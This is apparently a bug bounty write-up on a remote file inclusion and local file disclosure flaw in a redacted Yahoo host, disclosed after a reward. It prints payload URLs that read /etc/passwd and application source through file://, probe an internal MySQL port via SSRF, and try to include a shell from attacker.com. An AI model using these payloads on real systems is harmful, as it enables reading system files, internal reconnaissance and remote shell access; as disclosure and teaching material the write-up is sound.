Yahoo! Escalated Remote File Inclusion Vulnerability.

Hello Everyone 🙂

Today’s article will be explained in 2 main phases.

1- How i found the Yahoo LFD/RFI (Local File Disclosure/Remote File Inclusion) Vulnerability

2- Exploitation Techniques

#Important Note: Yahoo! asked to remove the domain name and some other parts from this write-up before it is being published. also the video POC has been removed to not disclose the affected hostname.

1- How i found the Yahoo LFD/RFI (Local File Disclosure/Remote File Inclusion) Vulnerability

As you know, it all starts with information gathering. after collecting some Yahoo sub-domains, i started working on:
https://x.x.yahoo.net

with some file/dir names brute-forcing, below page were found:

https://x.x.yahoo.net/mod/test.php

By viewing the page source code, below page got my attention:

as you can see, images are loaded from remote url using the parameter named as “img_url”.

By tampering with the parameter “img_url”, i figured-out that i can include remote files and not only image files!

2- Exploitation Techniques

NOTE: kindly note that all the payloads has been tested on “x.x.x.yahoo.net” which is a redundant/secondary server and not on the main site, just to avoid being detected and to avoid causing any issues to a Yahoo production environment during the test.

After finding the remote file inclusion vulnerability, i tried multiple techniques to gain shell access to the server such as including “http://attacker.com/shell.txt?”. I also tried gaining shell access by LFI such as injecting log files and the famous /proc/self/environ trick (References: Ref1, Ref2) with no luck at all.

It seems the server php.ini configuration file is well configured, or maybe it is all about how the backend code handles the requested URL’s?

 Time for LFD (Local File Disclosure) instead of RFI:

first thing that comes in mind when thinking of LFI/LFD is php wrappers:

Although that php Wrappers php://input, php://output, data://, ftp:// etc didn’t work for me, Fortunately 2 techniques worked. first is using php wrapper called file:// and second is using normal http:// protocol to access internal hosts.

1- https://x.x.x.yahoo.net/mod/display_img.php?img_url=file:///etc/passwd 

#file:// is a php wrapper used to access local filesystem

By reading the /etc/hosts file, i now know that the internally used subnet is 192.168.100.0/24

As you can see from the above screenshot, the database server is hosted on 192.168.100.1/2/3/4, which were confirmed by a simple SSRF (Server Side Request Forgery) #to not be confused with Cross Site Port Scanning (XSPS) as this wasn’t a port scanning but SSRF.

https://x.x.x.yahoo.net/mod/display_img.php?img_url=http://192.168.100.2:3306/

#3306/TCP is the default port used by Mysql Database server.

Now let’s scan the internal subnet for live hosts, i wrote a simple python script to initiate requests to each IP, if a valid response is returned, then the host is up and running a webserver (it was done on different ports as well).

Brute-Forcing filenames/dirs on an internally hosted server:

As a final step i did read the apache configuration file to find the configured path were the application is hosted:

Next  step were to read some source code:

https://x.x.x.yahoo.net/mod/display_img.php?img_url=file:///home/httpd/httpd/class/db_class.php

Although that i was able to initiate requests to Yahoo.com intranet, Yahoo still consider Yahoo.net as out of scope.
Yahoo rewarded this critical finding with 250$ !!